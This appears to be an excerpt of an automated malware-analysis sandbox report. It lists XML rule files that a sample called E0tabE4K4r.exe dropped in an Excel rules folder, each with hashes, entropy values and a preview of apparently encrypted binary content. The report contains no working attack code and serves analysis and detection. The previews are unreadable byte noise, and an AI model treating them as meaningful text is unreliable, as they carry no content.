                                                                                                                                                  Preview:<?xmlF..v..RV.QG6`1i.qV.8..]C..,...........,..Y...k.m.(..Ba.~\.C..._..kT......U.`X...:C..6..../.}...A..d.vO."..*.).~d.J.....X\.....^.......X6.#i8...).9Pf.U)V......6.!G=.R.87 c.C...g..Gb...m.........6..}.t.`...,T.Nb.WQS..o....Hw*..uHe...l4.I.....y.@8.;...9.{>}.Z.b./;}..Zc.`F.|.....w#o..k9(.m.N.#z...o.Z.bD.]...a+A.56.....Y...2.....>..........,...}.O.b...t>.Hh.:..B..Y..-..k..a..}..0....;>..EH.3.I....cS4!UwW[.....Fio.W...`!6..1Ar.uuSc2....v.7]..L......J....'%aB.."...!m .up...y.g.....R.(<.7d.4......V<..J.S?k......&..w_.D>5E0i} ..h.....J..4..mK..[...s.C.z_..3....Y..l....F..`..v...r..N...GG.;..<.k...q....}.X.w.p(../8.0..A..).X.X....-.m..E1.~.n..........IR...B.....A...<.Q.....)......o....>.gl..S?........qQ...b...Z.].Cp......&^..Sm|.%-\..~.!.0.2...n....2....QY......y.w...\&..C.Z.pB{..m...s`v-..2. s`a...c.e.../.K_o6.1......<...!....o....1.x...._sC..&..x%4\.&L9f..jE..I....".....PjN.6..B......|..;L.x.K+%Do.Z.....y.+...`.......R......rfd..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324002v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1197
                                                                                                                                                  Entropy (8bit):7.827873484629628
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Q57uQQbOmHbowZrN8544lsx4XdeiT/BpShZxfCRKix5LN2oXO/Nm2bD:Q5yJbVN74lsxgcE3mrWLN2oc7D
                                                                                                                                                  MD5:1F202DFC38BE8A2829F45190AD9B343A
                                                                                                                                                  SHA1:77A65B21E1405EC090E0B8AA653BC0DEE17D14C3
                                                                                                                                                  SHA-256:382C3BB705A5C94CC441DED151B921B88EDCCBE2FA7D9120C39CA13C3024E5A4
                                                                                                                                                  SHA-512:257B830FE323F08A704B00D4E412C391055764079153AF07FFE20D59E35AD062C5B6EAD81297045CE8043D003F4763E1A9CACFC79B69D8313AF96A8322E4EDA0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlR.....?.t.9.p..S.....P...Cq.........m.....#..d..5Q..c.1C..W.8.>.|G%...XA.^.@'Z.l..W......g.....3...Ur..>.~~..=....'p.I.0..e.[.q..g`?P...Ekg..C...j_..)...X..p..+*...2....=...l..1...HT.$[.=......S)#H>.H....>.Z)T^,7.)...v........W...e....&.9$....+..$.{Q.Z.b..GG.4.uc..u6.7.....o...N.!..,..\.....A.5...!-..m..<....V.U.J.a.[.1L..-%..@8...dU.]J.......Q.>"..}.57".me.......9xDSA.J.....".m.J .o4...6....2...4......t&r..;3..zMy...6.Aa..v...q=X.~sW..0...R>#.....!...r....+..m..P.$..O.Vh..dp9E.RV.T.........e....?W....z0. ...........#w7.f..#...3......wQ.V.......5.i.|#.at....~".g...!...6l. 2n.).nW..\.]A.........e.3.{.........S...c....d.#.p,....Hk&........!:.n........[.#...$.:....c20.....Y.;..!6..#rwj...%+......{+...Bo.8M..-...<....dR.t\H......Q..H.V.z...cJ..w.i..3..6Q}M..UJ.<Z8.8.. ..Eo.t`=...2))..]..c.<...*....a.#.`...o.5.%N~4?.7.O.+..z....H.#<...^B.nxR..).....6s.....h....<S......i.)*..........g.....9.|..JK..G....+c...14.Pf.YG.EiK.....e.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1079
                                                                                                                                                  Entropy (8bit):7.832479975393911
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:9LYyOqUj0GrwIyojlWj34Ij5Kt1/WI4ZDB6wlLokwi+RY/N2bD:9cXPrwIjl+njQWIyXLx+e/mD
                                                                                                                                                  MD5:4C1EAF94D10716206CBC07B8FCC76A0E
                                                                                                                                                  SHA1:EF686405F50CF0FDC30B79E8660539BDC676A33A
                                                                                                                                                  SHA-256:D9EECEFA40FC4E4B7A8A5D2D514B57A780B3BD8B8C3BAD2154B60A7B242302B0
                                                                                                                                                  SHA-512:56B95AECD907625F0A6EA6B33F1FE30C71C312E954C4BE85BE504442F6C355F8FEBB60A5BC2B94DA33C047790F0072F373E15699A761F7B3C53E2B0D688AE933
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml......>n.t..p....2-...S....K,f..v..(|.)..<.... N...#.......7_F...+.l.d..Yv....c.o.T..s..xKY'C~..l.I..U..-9...N.bk|._.....`.-Rr%`.L.....d.u[:.9.#`dM....T..i.w..ix.3..G.l..C.HYM....D?)...|...B=h8.LerCn.@`..k*?..].&.._3Ox.H.o..F.H.}<......*.E.X.....#.e.A...../o.QUHz.U.h....D..iJ......^yP.ql..p../..,.Vs.a.....<...=zG*.iws.3...f.'+X.n"tr'b....7...PN.7......-.W.......I.y.s..5f..M.R....f.`=.m.].;T...b..4.hF....\.J.....%2...uvD....G.2....F...F...Hq.,rH...!.....1.j>..`c...=.......[.(.....q../.."oC9...MM.....I&.R.~R..m.V.Z..+.e....^......0.M[.=.y.2R=.i[...-..77...EA.U.....:].=.T.{.".I...m.~......@.kN7\4.........o..g.Y.~...~..f%U.T.1vW.0Y.%s..K1?y..}E)9.....1....%.U.322`6..H%m+U.........g.N....-.j1Pv..s..PC7.BLK.....,`3....v.......(9T..O..PATP..m{...uJH.Y...?)..s..d...9...g)....1.]k.e.*...?.w.|..h.).~....p`.#.?N..UQS..N.....E:\.L.....4;.S.tW............).G{Y....2..Z:..3..B...z.DGP..+..O....7..HNp.wo.$......wa.k..lL;...!...B..n..b..i8...hM..Q./.u;....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1079
                                                                                                                                                  Entropy (8bit):7.806101561362746
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:PKNJwcEQUJN3b2FJjsGAabKrED6VmAJ5pJdMVBzgbs+2bD:PKNjG8JjpAaeW6A8QVBznlD
                                                                                                                                                  MD5:9DF49D62C92FB2BE4497673E1CF99DA4
                                                                                                                                                  SHA1:DAA9A8BB55F64D327501975A43CAFE1D342ECA62
                                                                                                                                                  SHA-256:99E16AA8B7E0BB2ABCF7849990226776E7BB70C91DCAB8BFBD792F5EE470E1C6
                                                                                                                                                  SHA-512:D8B8BEB8292B53835134FF22D08170BB7867348194E77E26CAB1C8332D51829309197364EB1CB3BD64174279B2CD40863C5B306EC9A4C14356B8567F7D0B75A6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...,$YX8.`.o..V...+..Kj.+....sG.*5..!....B...|>..U....n.n............zC8..#6%..NN..k.g.........'..(.pvCb:f.$(=._.l.e...d..X.B8..{Azr_.<....n.}.a}...O.R.%.(&.Bd.qNH`........V.:...r5...9.....d....%.....!.1E.&..\,..$...r...qK@.Y.....=..;.~aG.e....f..jB2.;.Z..d&.T...~..9......d./G3N..3!-2......{C:...Y.}...].(1z.aR&..j.q.-1.Xe ..+A$............Q.Q......h..[...1W.&0Tv..(e...^....f.(....@.'V Q5......xU.a..{.%..z,OS..v.A.`.$...1Ck....u2..B..........9.W.(..(.....}D9.A.:....Q.m...Y...9.w....?]L2._...s..=%t|.S..85...h.K.[......U.T8....l...@....*..D<[.1...Y..k....>.n.O......8.I[..z.t.t...:n..a.g#.c.=....=..H...$<....vU.y.....+w...nvb.k#.=..@....t.....-c./.m.?....<.d......\..".3..kYZ...A......c>....'e.GW(.4&..j.:.".#...k..>O*........q..<..dU..q........3..m.V....-......(.%&mSK`Y.;Ej..x.N....~..GS..`Kg..&..R..a.}........R...$....2.$id..J.k.......A..n...^...H..^.1.j.3...$.......al...V....&..... kVe]...".......Z..-pj.s..c.g........+.brt.w..6<...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324003v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1079
                                                                                                                                                  Entropy (8bit):7.814861601837753
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:fNpLs9xBTus+ACx/9Z4rrXRW1NZrEnWSlcqiuowo686r12bD:fNpI/T6Nd3q4FEn7iBOpOD
                                                                                                                                                  MD5:D089AF8EA87AFDE5A553CEE81E89D8B3
                                                                                                                                                  SHA1:3B175A79ECDD0E74C128F3EC6F8B893D72CB9971
                                                                                                                                                  SHA-256:31BE8E4C1F526B10EBD5CFD286B19DFB817F1AEC19AB962D63373CEEC8ADCC0E
                                                                                                                                                  SHA-512:8DE14DADC192A01F5A0B3FA93243D1AB0337CCE3B93F0C859BFC763E40E154EA58C8E071D1E766DC46F65587B560D4967E797471405AFA2B3C27F031396B12F6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmli}.{O.3...@@u......a.P.T.6...8.....(..ED.....*-..^.-.......L...gx.....p.!..uFg...}....._G.,..f."i..j.0.....M.3.TWpj.i.QK.&...|.]...zs)x.um.yV..r..H.A...lZS..L.R.+|.B..G......J.....V.=&...&c.d..aL\}.g..6....Z...L....4...<d.#Q[.7..)./.n7.;..7...._=.0.~.....*5....V...".V.k.b..p.1$.~.e.c.U.0......!"}c3..)8Y.:.R..x.:se.#!..nr|.....X.. .......Ei.. ..U...g....Iu.{.c.V...od...[. !.=.._;..T.?.4..aI-r..[S+....<.xJ_......6).....0...#Q..(.4.>t.O..M.#.2...:.kZ...2..2B...S...M*.....3..w.{...Q...ic...?....W5>..U1*X....%i.. eYn..;S..../.........w?..~.......Z~'.`.I`q....0..t`K.sA.,.HZ..a*.mS....f6.,.l%....C71D+a.}...b.~.UR..8.3....4J" ....[\;.rY..)..-...NK...d._...x$...Bk._j.....8.5.......x.&.p..h9.....y.z.e..v...V........GC...@.q..Gk.<.....x..htHg.....:.........E) &. B.>...[U....H7..V4O.@..M].... )9...OS....*......s...g...9h.......I..EE........k...D.i..4.6A.,......dT..gK.....Z....V...K..ZK.d,O_ S....(U.F.d.6.T\...o.."...].W...C..../*.Q.G..0M,.q>w..7.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324004v3.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1073
                                                                                                                                                  Entropy (8bit):7.8219691437073
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:zMbudfgIB0I+I+cxWsued3dRQvYTwV3xEfjOQK9cgxubTB2bD:gbbIB0A+cQedtLMpu8CAUaD
                                                                                                                                                  MD5:E8B918BCD090E1F21C30D350C848E77B
                                                                                                                                                  SHA1:9E3E8681EABEFBA7F5A72562D87F18ADB1FC279E
                                                                                                                                                  SHA-256:E1348AD51D26CF4C73821C4C24B394A34EA87EBCE16B3C2F72D614A3187EA398
                                                                                                                                                  SHA-512:FDD3A8299744CA5331AF09304EB390B4020D783FF8EB3F90355C37EE4DD1B18D1D9C60EB47CDD2A095DE5247E2A85D3E2F1AC99EC65B7C40F4CB7037D4FD8D6A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.\/.g....s.6...3n.w.p ;..aqjB.m..`......../7.....;..]......_:.m...Z..A.....=...f..60.....#-:W.k... ......P2..l..n.7.#...?^...w...I......$..v...V..2YH.h_=h.e.=.'...mp...S.EDR.wl2...>,.....;.U.k.IyUR.5....?/y.c.....*...v>...c.^...\5.2X |...6(.1U2.7...).......O..wO........g{L.L...."...W....mE..Y.7...].)?......<H.'e......@.xQ....Dv..KO.&=...qa...d...{a....X.U.G..S....{A....H.Zi.u~.wSV.`...]:4-P..Y_.Wl.E..-....^mc...v......=.L...@30.V.r......MA".*.....p.....R*`...aY.....z.D.h-:.X....z.du....f..'r..|M,A@.....r[..F...!...R.@...N..j&.|...i........"....3..,......7.......2 .1r....\H'.......~...cM.lCO1.<.kg.........A.. *.n.Ck+......2K.(.'g...C.w.5#....0..L.?6s..m.y..x.-...\J.s.8k...(...$...VN..E1.C...e......zO...v.C....(w..2.jl.K.qR.j.<.*:~..b.../~..M.(B.....(;.......awYe....<. ...^9x.......5.4...h.!.$0X.y..G? bAC.o]..P...e_'.tc,+u....W.g.n....@x.....G.....Y.W..b2.....i...U.3.#..../..6.^.KE..).u.7..'............Ts..ZL.p......|^?Fe./...c.mMsRx

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324005v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):933
                                                                                                                                                  Entropy (8bit):7.7661078007415325
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:WI5fub+sYSbB5PJZmIqtTvmodZ/+m/iCV2bD:WIIbGSbBfZwFmkf4D
                                                                                                                                                  MD5:3E123EC209296A437120E76584F44E8A
                                                                                                                                                  SHA1:A1D5DD85C7FBA1146F22D8CB81F0D3ACC63AD621
                                                                                                                                                  SHA-256:F97565E80DA8F74A9FF63D2A77E73C64609FE01D3C6C96A616EDCC5433D4DBD8
                                                                                                                                                  SHA-512:B56BDFCE7A7035B7675746313E991FE0FBFC2CE8D5F2F49ADB2E8A18D881F52964D2EC3E8A8A32AA6533E91E180111CC19685371110E1CAF13F0A738089A1AB8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.TA.........r....r..8.O,..._b......=...!..\..!Y^.88`...K...Y~.....g.E../...tY..$.1.f.5...R...I...(.^.4$....L.T.A..Gk..W.w.\.......z`..p...iw.a.}z2.1.{z..OZ.b..v.0.5...6&..o...?..y[c. V...?@?;c%5....:..e.d....L.P.4.v.vo.F....c..T....).~".&.~.,_.....<DV...3.N...].`Q.<....!..39e..vs.c._.4..m...E........=._.W4..e.[...w\./q&.s=(*...N VB..l....s2}....k.3x.?B..(..H..7...#.8..~.#!1....F2:.....Y......^.....`.7.....p.pz.S~..y....I...l.}..<...?..Eu..E.+................*.....b...K..S..M...r........]...N.q.......+.'...`..V.....!..B...d]..Do.....=l...GAB...G.g.....F\...L3N....Q...ND.T...@<H..;...z....Q..].E..*....-.Cx..,..=...$X9.->L...X~.Wr..M`...fP. ..~......&+-T.7.._..n...n..H.4.{....$s.?P.....{........m.>.L..;$`.:1Evp...!...O.U...k....{..5.=0C...p....`........._..]&...4~..-....y...^Q....0;....G...q...l..zmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324006v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):933
                                                                                                                                                  Entropy (8bit):7.77328634605247
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:IH7QR5SEuurmZ1yxGmlVHf9xNPbGa00M2bD:M7QR5pu0mGkmv1xNN00fD
                                                                                                                                                  MD5:9D05D82473B53772471A88460415C79A
                                                                                                                                                  SHA1:E1CB1D2E1C8EEBA411DEC1942344DAEFB2EA93CD
                                                                                                                                                  SHA-256:5A6678FDDC81DC97BFD7B7F4766603EA19DD876107A97D4538E67789D404B9B7
                                                                                                                                                  SHA-512:93D8092B7E3E04B52DA01056F9D4F51E2E4BB5B91CE7E7FB961F771F944DB458AD6388B5AB97A8AF40F0C32D1C6FC80530B58B16E9C6E58F48D43E411D5B253C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlkY[.7V. ......y5VS.....Q.:..1.Of.k.....~.O.SsOO...b.....8.......QspQR.H.#(#.U......6..........K.4c.H?U.#K...5.@5F[W.RN.....V.v5..&..\.%...`.l.@.S.x..j..Qz.;..T..4..B.....1..Z.NPA...j.}#U....z5..o.-.........[3..o.x..`.EM.7...e..S.G.1...@.A....>o......I...g2p.?.\LR...aM0^1.....;.E....{...z...v...z.R..Q.....B.unp`zj.D'.)....v...GJ....Q..N\..d....5.R7w..TM....^.......&..Q}......s]..<..t...Fx..v=I.f...m.6N.L.x....._w.4..ui.1m..s...:\.7O.GT........#...!...4Z..J%u?i..V......Xl.-v2.........6*.J[*i...%..L^.X.e.9c.ZL....#.-..4..@..........E.j....N.~.e.,....`(r83..'k...-.n..@?b...E.OYE.4|o.|.=....;f.>_.TM..b.TQ......3...-%G...4.....3W.(.O.J%.Z...q|R..qoJt5:...u2.............)..Z..=..T`..(.7...PWU.W{....A.Ey.].......~.....*....z ..9.....?..0o.....A...I^L...ukg.MH{.....Xa;H.#.].D...[k....0..h..pmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324007v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):945
                                                                                                                                                  Entropy (8bit):7.769742553122386
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:i1+1bI278+LVIixEDatQACZhgvMK6z1z/P0b57Jd0o1aj/YjlryrtchzCWSUdNcq:sx23VpCdIGz3S7JqDYj7YV2bD
                                                                                                                                                  MD5:DE67E662E81AA22E3785AB465730E580
                                                                                                                                                  SHA1:E8747378EC184CE04EC434822330A16792CF3422
                                                                                                                                                  SHA-256:2ED0CBD8916CB9AA3E802D44C47D97BFEB092D4CCFD91E4AADC7C2630D511977
                                                                                                                                                  SHA-512:B4D06B47629F430C676702C62EE83E774019CBE0E6C6E7F5475FEF28401AC0C35E6D50B900A0EFF3EB17A7D647B748193C5B7CFAE24CE312DED7F6AB014B66F5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..x...........~.T......l.)..'..2^.X.t..K.]s.r.0.6.....Z..G.MRu.w..#..,....?......u. ..!..wV...t.k.PK7u|G..".p.....P.(H...t....U...r..).me....JI..~V.. ..7K...r...qV.Ys&.#...%.6.7........w*..]..6......D.....g.vk..>..".=......z..l..Ss.. |.3.y.ww..q>|.}b.$..bCG..9-IY....hmz....M..= .KH......F.1.v......m.I...`.0......t.c+..hx.......O+.;.^.Q....nA.#.F..?.J.... QF-h.....w,._.Xp.....J..pS...........O'].;..;..o...e`.~.....2p+.Y&....\(..>.)'.zh@...n.Z....3.M.t.^(. ...||W...P7../..I......`~..t...H.J.:Q.&...aQ...R\%.8..p6.<f1...6.g.-.g.4....l..f.Q...||.(.?.Rz.pB...%....T.Y.&.7Zd 2A..G.Y.....x.....P.:..EQS.i..\..c..0x\.Z....b.G...m'^......p1t.C....g...g...7.4..:.oM.....U.....TF..*c.k.f.L.r.&.Dc.E.O...ME^9......>......@.Z...py.ay.nl..P.;..G1S.:...<..8..H.C,#.S."..]...wW!6.....m#....h...|r...MkJ.. z.!..:...0..$...S`B!.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324008v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):941
                                                                                                                                                  Entropy (8bit):7.764049147145353
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:wCs5DLQQr16yuA49GyoHnhdppiahGH1e1hBhG2bD:wB5vQQrwn9GrHDpWVe1hBrD
                                                                                                                                                  MD5:F58A29A85B6FFCF321316A4467D3A973
                                                                                                                                                  SHA1:4B973B190AACD1AF707FD53B501B75F5FEEAF68D
                                                                                                                                                  SHA-256:DCFDF2FEC3F802898F17E621EFAB5CFB5A305BD9F68FE6D3F2269A7034E2F282
                                                                                                                                                  SHA-512:280E698C6368498A324F0C6C0F9FB12D99A0FF2ABBDC31F54BAB10DF29BF80D679B2B8352F7D83D5A89326CE845D4862CFD637B564E78DD6A4B5214F13A3FF12
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlM.....TxX.. {.0...)...e..A.....?).L...7=....~r..M(w/.........".,A.+#...$..N<....nK...)De.dk...V....k9.D...W..l90.O..@mfo..04....d.K...O....c..:&...R..".Pw......G../..{e_....w...[...}..#.... .D..A.RL5......<?#@.g..............)..'?...*U..s6.X.dq.3s(.!Tz>&a.d..0.nE........B..>.hM?H".pE"0_*_}.s.;.@...@g...^Su5^XUs.S..W.~[vm(0.....':.;...6;M.......V..1.........F..<.1.GD...i.....$..l.../..5MSXc..xe........p.9P:Ym.......,."c..)...*7...x*v.....rG....Q+c..-.....x..y..}*.. .,3p..?..F.J.q.O........q....m.aE.OV.J.j....-..v...x....;.$....{_.m.aC..!..4.S.K.....8Xc.w...V..Y.w..-=..,.w....D".Y.;..P#....v...y.[..B._.E.K+.?.CY..8...I\>.(..F..\U.....FD..~..HL'y. i/....Vb/.'.O.*#.(,s.0...s...d..2Nu..L.....}vp/........"...>K2........6.XE.8s.].Nj..)..=.w=.."HA.e....F&...@..u..|m .........=..q.s.0c..*.....Ft........qG9.B./......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324009v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):945
                                                                                                                                                  Entropy (8bit):7.8149406807020725
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:nJIyGAnHCnXzdrWCBwLmsJ1wKlKHpa+2bD:tG6H0j9BpsUGKQlD
                                                                                                                                                  MD5:B724E00301EAA07C9A1B912A017240E5
                                                                                                                                                  SHA1:C9CFCB799C33E20F823CE16F6F082522B87D8587
                                                                                                                                                  SHA-256:7134CB13A25204F33D9AD09955FC458F3573ACFAF27309FF652670DB3F85B0AF
                                                                                                                                                  SHA-512:1292E5F21D742518A374A35238B7CA111892E4D98C81D2A1583D5D75D84C87BF62C76F63AD29B266C8D8372C03032B5C9B2688368B8F48E0D73C70A82C39275F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..x...'.@I..AX.....F.e..h?)B....S..r.]+h..u.....i.YJ.,.nf....O/R........i.P~...............6.u..Q.pwW..]..w.t..i.......r':>,.m.d....;.O.b.....s.0..*.........z.t.2..l..X.|n.4..*.8Pk...3g.....+_.>.(.g8.L..L&.........r...2.O....R[!...C.$x.N.hyv...C...Sq.g.......}...~...q.R......I..m......hpz.~......t.L.mx.^...e.O..IE..JP....5\...d.....6.,X.3.m5.2.BbRT..nm.j.m#..........{.,R.!?...Y..Xq...7......%...Z.....l..G).!.,.N.p.p.....m.L0B...b..NM.>e.=,l....\..x....-:....;eg...|,...Jgya...a...:k..zc.].Pv..N.(.:.'..y.H.77.]..e..*%...4...diV.l`}~.KYLD.^..c..v.BMj...G.c...[..H...r.FQF.Z..{X...m..G}..D...$.o..*.mN.PO..Q\DD....S..e....`.ut]q.gS/).$5...!V...X.9i.k+F."./.....'&I.Sk..".^..Zn.....J.l._s..j..[..ai.. Z`.e.....S\.9.2.s.t.Y.PSA.H..Mk...h9v=.H.Y.o....&...D..U0..L.J....@!/.....B_T(..=...b.....X."_vS.)g.u.*I.U.Ta..i.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324010v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):945
                                                                                                                                                  Entropy (8bit):7.774148651060401
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ArU1s2gae88fWw+U6WtJaw5eM3l6qumXlHSL2bD:ArUGt+wZqw13lke7D
                                                                                                                                                  MD5:0999E754A2E263277AFEC3B8341BCADE
                                                                                                                                                  SHA1:208EDFB43895687D4212C7ED92B2F085641C64E1
                                                                                                                                                  SHA-256:3B6579DA23FBC89E81FF81C859DEFB21EF45F56EDAC0A8D8005E5F5FC8E400FD
                                                                                                                                                  SHA-512:ADD78E83AA4F2BDD39D59B88F17CD3C64F30FD59F09BE0F134A67CBB13A95AA67F717B940DE0D38C46722FD7B6C825C5C65313E9F5A8F79D1427D817F90C44D3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml[.1.|..g.K6i........r..A...r1A1..[e..e..q2.j]Q4...O..M$.A...f.<.8J........`....269.mO...O.(..]e..s.N!...........H..j.P.a1_R=....Cy.N....3./^Y...&...Qz-^.Z<.......<...n{H...*.$..Y.....zZ.V.l..!.H.b.....y..4....nn.bq.?~..jz%....Nc..H.|>.0.\..KX. .....K.n....p.Q....qD.9.([..%..dTB0...%y.X}).DN._..6kC...c..hv..E..*..U.o.j....b.4.Cp...uhm....I.:. .>..s.,......%......4:a.n.ED...:.;&......5...t*.h/.p{-...e...|...........x{H....jP..k..8.. .'...e6^..Yk.{..Z.=nI+...d.h....3..7h.0g.)............T_.]..o......%7.ECP.n....O...EE.U(.po%.....-.rP...N.v.>....a)...K..?.1..o'K........../^....M.r.|...{cXvI..."+gm...D%....5.;Jt@..\.. q.8....t..., ..,......%V........Z...Nk...2..E,-.!.....4.]...s..u.._.:...C.....Z%{.N.e.W:.^*k^*.......S.,.........(..N+....>..!N.7]...&jw..{..]....W......*.....D......J......V.[.JkB....H.....J..5....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324011v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1000
                                                                                                                                                  Entropy (8bit):7.79966138540092
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:s1MXdXoymS/YRMiIGs8CS3ATrFiD/ARji0HqkI2bD:sWXdXoyX/YRMW56TgjARjsk7D
                                                                                                                                                  MD5:98CCAEA202CF9245A46B7A984D36D32E
                                                                                                                                                  SHA1:F1C7BE76703259DAC64714DE8CC5E63839E03776
                                                                                                                                                  SHA-256:E41179CB35E18AF37621092A1F07F07ECF0578337FECE9323638F236A9A62798
                                                                                                                                                  SHA-512:FD553524DA6124EAD7B5F4FA91736012860177BBF69ADE16E7A56AB823B118650AE8D92435F92A155A41550F001641591ABA144794CFAC78E37B1AD3D34FC535
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.h.....j...L.]`...$$.S..t.....S.N.f..../.@....1.P.%..[....%...H&f.S(y./T..E.N.cZ....:...:....,........p...S5....5A.L$.^.......6.<T..=aXf.+....|m..vBb. c.}....8..0..1.G.b.>.....) .].N.g9@............5.....C`.aXc.g.".kA#.....d.b)y.".Ux;...y... ..UQ/..l(.mUX-.NU._.c`.#.......bl..n>[...............R>..l8..i.,.raK.T.(_..0X.-g=...iD...6.Gv..&@..../#d....q........-e.W.J.T.P.@S...@...=>j.0......D..R.E.$..Q<..]..+k..X.....1..("|.....F...UP~..7du....dj....8..1......k..a8....h.i.....CV.Y~..,....S5....J$..#..Qk.w!!...Q.O.....:.v.le)..VaL>i#...q5U...q....fW...;`H...7..n.s......a......2]...sc4V.vd..........Yr..&O.....m...~@..j.y...~p..4.~.P[.]dv....Z.". ........;.8S.......p...H.d......%.f..4..U........V...d5...u>.'.,.,.'.....dj...U.....`O..5...H.AA.b.....9.,r..\..uX....8...~iT.@!.O.+.....}}..+./.s.&\]2O.j}|}...T...).L.2=...s._?..1..bM! ..%.!.....m0K@...BX<..E}.M...=QmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule324012v3.xml

